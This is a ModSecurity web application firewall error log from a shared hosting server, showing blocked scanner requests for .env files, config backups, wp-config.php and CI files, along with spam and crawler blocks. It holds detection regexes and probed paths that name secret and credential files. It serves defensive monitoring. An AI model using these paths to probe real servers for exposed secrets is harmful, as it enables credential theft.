[Tue May 26 15:06:28.329410 2026] [security2:error] [pid 678998:tid 679120] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/bitbucket-pipelines.yml"] [unique_id "ahVpnJ-Rl4i_pgT-iAdzVAAAfHk"]
[Tue May 26 15:06:28.591573 2026] [security2:error] [pid 678998:tid 679233] [client 76.35.123.197:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpnJ-Rl4i_pgT-iAdzUAAAAGk"]
[Tue May 26 15:06:28.916717 2026] [security2:error] [pid 678998:tid 679225] [client 192.186.162.26:54060] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "192.186.162.26" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpnJ-Rl4i_pgT-iAdzaAAAAGE"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:28.916856 2026] [security2:error] [pid 678998:tid 679225] [client 192.186.162.26:54060] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpnJ-Rl4i_pgT-iAdzaAAAAGE"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:30.089556 2026] [security2:error] [pid 678998:tid 679001] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.gitlab-ci.yml"] [unique_id "ahVpnp-Rl4i_pgT-iAdzlgAAGQI"]
[Tue May 26 15:06:30.171726 2026] [security2:error] [pid 678998:tid 679237] [client 185.191.171.5:22554] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVpnp-Rl4i_pgT-iAdznQAAAG0"]
[Tue May 26 15:06:30.171885 2026] [security2:error] [pid 678998:tid 679237] [client 185.191.171.5:22554] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVpnp-Rl4i_pgT-iAdznQAAAG0"]
[Tue May 26 15:06:30.359267 2026] [security2:error] [pid 678998:tid 679159] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpnZ-Rl4i_pgT-iAdzkQAAAB8"]
[Tue May 26 15:06:30.414122 2026] [security2:error] [pid 678998:tid 679138] [client 192.186.159.87:40421] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpnp-Rl4i_pgT-iAdzkgAAAAo"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:30.781950 2026] [security2:error] [pid 678998:tid 679138] [client 192.186.159.87:40421] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpnp-Rl4i_pgT-iAdzkgAAAAo"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:31.250638 2026] [security2:error] [pid 678998:tid 679245] [client 114.119.152.167:26587] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVpn5-Rl4i_pgT-iAdztwAAAHU"], referer: http://haddingtonwines.com/cart?remove_item=f08b7ac8aa30a2a9ab34394e200e1a71
[Tue May 26 15:06:31.582448 2026] [security2:error] [pid 678998:tid 679152] [client 172.225.77.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVpn5-Rl4i_pgT-iAdzvQAAABg"]
[Tue May 26 15:06:31.902820 2026] [security2:error] [pid 678998:tid 679008] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/environments/development.rb"] [unique_id "ahVpn5-Rl4i_pgT-iAdz0wAATQk"]
[Tue May 26 15:06:32.212484 2026] [security2:error] [pid 678998:tid 679160] [client 192.186.165.254:56204] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpn5-Rl4i_pgT-iAdz0QAAACA"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:32.322018 2026] [security2:error] [pid 678998:tid 679228] [client 172.226.44.179:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVpoJ-Rl4i_pgT-iAdz3wAAAGQ"]
[Tue May 26 15:06:32.355815 2026] [security2:error] [pid 678998:tid 679166] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpn5-Rl4i_pgT-iAdz1QAAACY"]
[Tue May 26 15:06:32.575514 2026] [security2:error] [pid 678998:tid 679160] [client 192.186.165.254:56204] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "403"] [hostname "www.yourstorybag.com"] [uri "/wp-comments-post.php"] [unique_id "ahVpn5-Rl4i_pgT-iAdz0QAAACA"], referer: https://www.yourstorybag.com/storytelling-as-a-career-for-women/
[Tue May 26 15:06:33.748770 2026] [security2:error] [pid 678998:tid 679011] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/environments/production.rb"] [unique_id "ahVpoZ-Rl4i_pgT-iAd0CQAAJQw"]
[Tue May 26 15:06:34.459332 2026] [security2:error] [pid 678998:tid 679227] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpoZ-Rl4i_pgT-iAd0EAAAAGM"]
[Tue May 26 15:06:35.548256 2026] [security2:error] [pid 678998:tid 679017] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/config/environments/staging.rb"] [unique_id "ahVpo5-Rl4i_pgT-iAd0RgAALxI"]
[Tue May 26 15:06:36.651254 2026] [security2:error] [pid 678998:tid 679207] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVppJ-Rl4i_pgT-iAd0XAAAAE8"]
[Tue May 26 15:06:37.878062 2026] [security2:error] [pid 678998:tid 679018] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/wp-content/w3tc-config/master-preview.php"] [unique_id "ahVppZ-Rl4i_pgT-iAd0hgAANBM"]
[Tue May 26 15:06:38.818051 2026] [security2:error] [pid 678998:tid 679217] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVppp-Rl4i_pgT-iAd0mAAAAFk"]
[Tue May 26 15:06:39.836944 2026] [security2:error] [pid 678998:tid 679030] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/wp-content/w3tc-config/master.php"] [unique_id "ahVpp5-Rl4i_pgT-iAd0tAAAKR8"]
[Tue May 26 15:06:41.023014 2026] [security2:error] [pid 678998:tid 679164] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpqJ-Rl4i_pgT-iAd0xgAAACQ"]
[Tue May 26 15:06:41.381834 2026] [security2:error] [pid 678998:tid 679156] [client 45.148.10.62:58682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dimensioncorporativa.com.co"] [uri "/.env"] [unique_id "ahVpqZ-Rl4i_pgT-iAd03QAAABw"]
[Tue May 26 15:06:41.536339 2026] [security2:error] [pid 678998:tid 679165] [client 45.148.10.62:58682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "dimensioncorporativa.com.co"] [uri "/.env.bak"] [unique_id "ahVpqZ-Rl4i_pgT-iAd03gAAACU"]
[Tue May 26 15:06:41.650362 2026] [security2:error] [pid 678998:tid 679079] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.shared/.env"] [unique_id "ahVpqZ-Rl4i_pgT-iAd04gAAbVA"]
[Tue May 26 15:06:41.964517 2026] [security2:error] [pid 678998:tid 679206] [client 45.148.10.62:58682] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVpqZ-Rl4i_pgT-iAd04wAAAE4"]
[Tue May 26 15:06:42.393123 2026] [security2:error] [pid 678998:tid 679216] [client 45.148.10.62:58682] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVpqp-Rl4i_pgT-iAd06gAAAFg"]
[Tue May 26 15:06:42.547668 2026] [security2:error] [pid 678998:tid 679186] [client 45.148.10.62:58682] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "dimensioncorporativa.com.co"] [uri "/backend/.env"] [unique_id "ahVpqp-Rl4i_pgT-iAd09wAAADo"]
[Tue May 26 15:06:42.770448 2026] [security2:error] [pid 678998:tid 679221] [client 45.148.10.62:58682] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/test.php"] [unique_id "ahVpqp-Rl4i_pgT-iAd0_QAAAF0"]
[Tue May 26 15:06:42.822414 2026] [security2:error] [pid 678998:tid 679192] [client 143.244.49.23:8626] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "bookmyitem.com"] [uri "/.env"] [unique_id "ahVpqp-Rl4i_pgT-iAd1AQAAAEA"]
[Tue May 26 15:06:43.004804 2026] [security2:error] [pid 678998:tid 679182] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpqp-Rl4i_pgT-iAd0-gAAADY"]
[Tue May 26 15:06:43.674998 2026] [security2:error] [pid 678998:tid 679217] [client 45.148.10.62:58698] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVpq5-Rl4i_pgT-iAd1DwAAAFk"]
[Tue May 26 15:06:43.978956 2026] [security2:error] [pid 678998:tid 679165] [client 45.148.10.62:58698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "dimensioncorporativa.com.co"] [uri "/.env.backup"] [unique_id "ahVpq5-Rl4i_pgT-iAd1HQAAACU"]
[Tue May 26 15:06:43.995137 2026] [security2:error] [pid 678998:tid 679035] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/system/.env"] [unique_id "ahVpq5-Rl4i_pgT-iAd1IQAAbSQ"]
[Tue May 26 15:06:44.130644 2026] [security2:error] [pid 678998:tid 679188] [client 45.148.10.62:58698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "dimensioncorporativa.com.co"] [uri "/.env.orig"] [unique_id "ahVprJ-Rl4i_pgT-iAd1JgAAADw"]
[Tue May 26 15:06:44.281925 2026] [security2:error] [pid 678998:tid 679151] [client 45.148.10.62:58698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "dimensioncorporativa.com.co"] [uri "/.env.old"] [unique_id "ahVprJ-Rl4i_pgT-iAd1KAAAABc"]
[Tue May 26 15:06:44.726094 2026] [security2:error] [pid 678998:tid 679244] [client 45.148.10.62:58698] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVprJ-Rl4i_pgT-iAd1LAAAAHQ"]
[Tue May 26 15:06:44.876083 2026] [security2:error] [pid 678998:tid 679128] [client 45.148.10.62:58698] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/.env.php.bak"] [unique_id "ahVprJ-Rl4i_pgT-iAd1OgAAAAA"]
[Tue May 26 15:06:45.021376 2026] [security2:error] [pid 678998:tid 679251] [client 45.148.10.62:58746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/.env.php"] [unique_id "ahVprZ-Rl4i_pgT-iAd1QgAAAHs"]
[Tue May 26 15:06:45.228774 2026] [security2:error] [pid 678998:tid 679180] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVprJ-Rl4i_pgT-iAd1OAAAADQ"]
[Tue May 26 15:06:45.455479 2026] [security2:error] [pid 678998:tid 679230] [client 45.148.10.62:58720] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVprZ-Rl4i_pgT-iAd1RgAAAGY"]
[Tue May 26 15:06:45.755720 2026] [security2:error] [pid 678998:tid 679039] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/api/src/.env"] [unique_id "ahVprZ-Rl4i_pgT-iAd1VgAAPCg"]
[Tue May 26 15:06:45.828938 2026] [security2:error] [pid 678998:tid 679054] [remote 35.229.206.236:54428] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 236.206.229.35.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVprZ-Rl4i_pgT-iAd1UwAAZTc"]
[Tue May 26 15:06:45.884184 2026] [security2:error] [pid 678998:tid 679237] [client 45.148.10.62:58720] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVprZ-Rl4i_pgT-iAd1UgAAAG0"]
[Tue May 26 15:06:46.324621 2026] [security2:error] [pid 678998:tid 679130] [client 45.148.10.62:58720] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVprp-Rl4i_pgT-iAd1XgAAAAI"]
[Tue May 26 15:06:46.738997 2026] [security2:error] [pid 678998:tid 679210] [client 45.148.10.62:58720] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVprp-Rl4i_pgT-iAd1ZgAAAFI"]
[Tue May 26 15:06:47.159850 2026] [security2:error] [pid 678998:tid 679173] [client 45.148.10.62:58720] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVprp-Rl4i_pgT-iAd1dwAAAC0"]
[Tue May 26 15:06:47.575559 2026] [security2:error] [pid 678998:tid 679200] [client 45.148.10.62:58720] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVpr5-Rl4i_pgT-iAd1fwAAAEg"]
[Tue May 26 15:06:47.594159 2026] [security2:error] [pid 678998:tid 679252] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpr5-Rl4i_pgT-iAd1fgAAAHw"]
[Tue May 26 15:06:47.641596 2026] [security2:error] [pid 678998:tid 679084] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/.env_mail_server"] [unique_id "ahVpr5-Rl4i_pgT-iAd1iwAABlU"]
[Tue May 26 15:06:47.723521 2026] [security2:error] [pid 678998:tid 679229] [client 45.148.10.62:58720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-config.php"] [unique_id "ahVpr5-Rl4i_pgT-iAd1jwAAAGU"]
[Tue May 26 15:06:48.166962 2026] [security2:error] [pid 678998:tid 679153] [client 45.148.10.62:47616] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-config.php.old"] [unique_id "ahVpsJ-Rl4i_pgT-iAd1owAAABk"]
[Tue May 26 15:06:48.614607 2026] [security2:error] [pid 678998:tid 679147] [client 45.148.10.62:47624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/config.php"] [unique_id "ahVpsJ-Rl4i_pgT-iAd1tgAAABM"]
[Tue May 26 15:06:49.223928 2026] [security2:error] [pid 678998:tid 679252] [client 45.148.10.62:47634] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/config.php.bak"] [unique_id "ahVpsZ-Rl4i_pgT-iAd1yQAAAHw"]
[Tue May 26 15:06:49.455331 2026] [security2:error] [pid 678998:tid 679041] [remote 178.128.111.105:46028] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "adityacreations.co.in"] [uri "/project/.env"] [unique_id "ahVpsZ-Rl4i_pgT-iAd11wAAOyo"]
[Tue May 26 15:06:49.685296 2026] [security2:error] [pid 678998:tid 679158] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVpsZ-Rl4i_pgT-iAd1zwAAAB4"]
[Tue May 26 15:06:50.118809 2026] [security2:error] [pid 678998:tid 679167] [client 45.148.10.62:47646] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "dimensioncorporativa.com.co"] [uri "/index.php"] [unique_id "ahVpsZ-Rl4i_pgT-iAd15AAAACc"]
